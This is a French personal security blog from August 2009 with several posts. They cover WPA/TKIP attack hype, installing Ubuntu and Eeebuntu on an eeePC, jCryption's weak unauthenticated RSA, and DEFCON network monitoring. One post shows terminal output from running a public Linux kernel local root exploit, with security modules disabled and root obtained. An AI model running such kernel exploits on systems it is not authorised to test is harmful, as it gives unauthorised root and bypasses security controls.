samedi 29 août 2009

Mais arrêtez avec ça

Voilà, je l'attendais avec impatience:

Zataz qui raconte - encore - des âneries (bon, en même temps ça fait 15 ans qu'il le fait, donc ça ne devrait plus choquer grand monde). Il pousse le vice jusqu'à la mise à disposition d'un lien vers le document qu'il cite, alors qu'il n'a pas du bien le comprendre...ou même le lire en fait (en faisant comme beaucoup de gens: s'arrêter sur le gros titre et éventuellement un résumé de 3 lignes, pas forcément compréhensible pour quelqu'un qui n'a aucune notion technique - comme zataz - et faire du sensationnel).
Alors bien sûr, WPA ne devrait plus être utilisé par les gens qui ont du WPA2 à disposition (pourquoi prendre un niveau de protection plus faible, quand on peut utiliser un truc solide ?), mais cette attaque n'a pas non plus, pour le moment, la même incidence, et la même facilité d'utilisation, qu'une attaque via airmon/aircrack utilisable par à peu près n'importe qui.
Quand je parle de l'incidence, je veux dire par là qu'on ne peut pas récupérer la clé permettant de "se connecter" au point d'accès. On peut *juste* déchiffrer certains paquets (typiquement des paquets ARP, dont on connait une grande partie du contenu à l'avance). Dans la mesure où l'on effectue une attaque de type"man in the middle", il faut un petit peu plus de matériel "radio" que la moyenne (là ce n'est plus une attaque passive comme une capture airmon+cassage hors ligne avec aircrack, là il faut clairement patater plus fort que l'accesspoint). Non, vraiment, d'un point de vue théorique ça met bien à mal la sécurité offerte par WPA/TKIP (dans la mesure ou WPA/AES n'est pas affecté), mais dans la pratique, on peut encore l'utiliser un petit moment, sa plus grosse faiblesse dans la vie de tous les jours étant l'utilisation d'une passphrase simple ("qui figure dans toute bonne wordlist"), et ça, malheureusement ça arrivera même à ceux qui utiliseront WPA42 dans quelques années (je me rappelle encore l'accesspoint d'un(e) voisin(e) quand j'ai emmenagé [pas encore d'acces internet personnel], avec une clé WEP, assez triviale à deviner qui aurait pu m'éviter de lancer airmon)
Pour finir, as usual, ceux qui voudraient des infos bien plus complètes et pertinentes, ainsi qu'une très bonne analyse, devraient se ruer sur cet article du blog de sid.

vendredi 21 août 2009

eeebuntu sur un asus eeepc 900A

Finalement je ne serai resté qu'à peine plus de 24 heures sous Ubuntu 9.04 sur mon (vieil) eeepc, Cedric Pernet m'ayant rappelé en commentaire l'existence de Eeebuntu, qui est une distribution un petit peu plus adaptée aux netbooks.
Je me suis donc rué sur le site du truc et l'ai installé, en suivant strictement la même procédure que pour mon ubuntu de la veille, et tout s'est parfaitement bien passé. J'ai juste eu un tout léger problème: le wifi se désactivait (dans le bios) automatiquement après chaque redémarrage; obligation d'aller dans le bios, mettre le truc wlan en "enabled" à chaque démarrage. Ennuyeux non ?
J'ai fini par trouver la solution semble-t'il. Merci Google.

mercredi 19 août 2009

Ubuntu sur eeepc 900a

Hier soir je me suis lancé dans une entreprise vraiment périlleuse: changer l'OS de mon eeepc (900A). Par défaut, il est livré avec Xandros. Je l'ai acheté il y a déjà quelques mois (en octobre dernier), mais jusque là, la distrib installée par défaut me suffisait LARGEMENT. A vrai dire, voici l'usage que je faisais principalement de ce mini pc:
- lecture/écriture de mails lors de déplacements
- browsing web rapide lors de déplacements
- instant messenging occasionnel
- saisie de données lors de déplacements risqués en salle serveur
Autant dire, une utilisation vraiment "d'appoint" (en même temps, je pense qu'il ne faut pas en attendre plus de ces pc là). De toutes façons, coder là dessus est vraiment mission impossible, à moins d'aimer remapper le clavier (bon, une habitude prise dans une certaine école fait que je code avec un mapping qwerty, donc un problème de symboles '>' et '<' très difficilement accessibles en azerty ne se pose pas, mais la taille des touches *est* un problème :))
Alors plusieurs fois je me suis demandé si changer l'OS était vraiment utile finalement. Le truc, c'est que j'ai réussi à dérégler un peu les packages installés à force d'y aller à coup d'apt-get update/upgrade, et surtout en voulant supprimer certaines applications. Par exemple, "mr patate" est installé par défaut. Moi je n'ai que faire de "mr patate". Et c'est le cas de plein d'autres applications. Sauf que certaines sont, pour une raison que je n'arrive toujours pas à expliquer, des dépendances importantes du système de base. Et qu'il est donc impossible de les supprimer. Tout ça m'a donc bien bien saoulé, et ça m'a incité à installer un Ubuntu 9.04 hier soir.
J'y suis allé entièrement au feeling, mais pour ceux qui n'ont aucune idée de comment rendre une clé usb bootable pour y mettre un os live (live-usb quoi), une petite recherche sur google mène à de la documentation utile.
Et après de longues minutes d'installation, le système reboot et est utilisable (il met environ 25 secondes à démarrer avant d'afficher le prompt de login), tout le matériel est détecté (j'ai du quand même faire un petit tour dans le bios pour ré-activer la webcam, dont je me sers pas), le wifi qui fonctionne du premier coup, le son idem. Même le dernier exploit de spender:
meik@meik-eeepc:~/wunderbar_emporium$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
I: caps.c: Dropping root privileges.
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc086b3bc
[+] Resolved selinux_enabled to 0xc086b3b8
[+] Resolved apparmor_enabled to 0xc06a5d84
[+] Resolved apparmor_complain to 0xc086cfb8
[+] Resolved apparmor_audit to 0xc086cfc0
[+] Resolved apparmor_logsyscall to 0xc086cfc4
[+] Resolved security_ops to 0xc0869b60
[+] Resolved default_security_ops to 0xc06a4b40
[+] Resolved sel_read_enforce to 0xc02933d0
[+] Resolved audit_enabled to 0xc0828564
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
# id
uid=0(root) gid=0(root) groupes=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(meik)
#
Il ne reste plus qu'à faire un petit peu de configuration/tuning, et le système sera pleinement opérationnel (après avoir fait les mises à jour, bien évidemment :))

mardi 11 août 2009

cryptophail

Korben (le fameux) a balancé dans la matinée un lien vers une sorte de lib permettant de réaliser des formulaires web dont le contenu est chiffré (par le browser, en javascript) avant d'être envoyé sur le réseau, puis déchiffré côté serveur et ensuite utilisé.
En lisant la FAQ, un truc m'a quelque peu ennuyé:
* How secure is jCryption ?
Well that’s not easy to say, the RSA public key encryption algorithm is one of the strongest and most secure in the world. It has survived over 20 years although it has some disadvantages/weaknesses. For example if you use a keylength +512bit. Like I mentioned before, everytime you submit a form the keypair will be newly generated, because of this fact jCryption, with it’s functions, is immune to some attacks. But I think in most cases it should be enough using a 512bit key because it’s not that easy to factorize a 512bit prime. But you can adjust the security level of jCryption very easy in PHP (see documentation page). But remeber the higher the security, the longer it takes to generate the keypair. Although jCryption offers some nice ways to bypass the waiting time of the key generation (see the full featured example).

* Why should I use jCryption instead of SSL ?
In my opinion jCryption is much easier to install and configure. Although I don’t think that jCryption is a replacement for SSL. It could be a nice addtion for your contact form or login page to simply make it more secure. If you need highest security you have to use SSL, because jCryption offers no way of authentication.
Et c'est là que vous réalisez à quel point des années de sécurité informatique tombent aux oubliettes. Parce que bon, les attaques Man in the Middle ça n'existe pas, c'est bien connu; donc on peut utiliser une clé de 512 bits (trop la classe, quand on lit que RSA 1024 bits ne doit plus être utilisé d'ici quelques années, même si ce n'est pas pour tout de suite) sans avoir peur que, au hasard, quelqu'un détourne le flux, et se fasse passer pour le véritable correspondant sans le prouver (car vous l'avez bien lu, "jCryption offers no way of authentication"), et puisse déchiffrer les données chiffrées et/ou les modifier (et ça, que ça soit 512 bits ou 4096).
Bon, au moins ils disent que ça ne remplace pas SSL. C'est déjà ça.

lundi 10 août 2009

Inside the World’s Most Hostile Network

Un reportage intéressant de Wired sur les admins réseau au DEFCON (qui a eu lieu il y a quelques jours).
Petite déception sur un point:
The staff offered mirrored ports to anyone who wanted to access and analyze a copy of all traffic traveling on the network set up for conference attendees. This is where the Wall of Sheep organizers examined the traffic to search for log-ins and passwords traveling unencrypted on the wireless network.
J'avoue que je m'attendais plus à ce que les fameux mots de passe soient interceptés par des méthodes plus bourrines, comme un bon vieux man in the middle/arp spoofing. A la place, c'est juste des accès sur un bête tap/port "mirroir".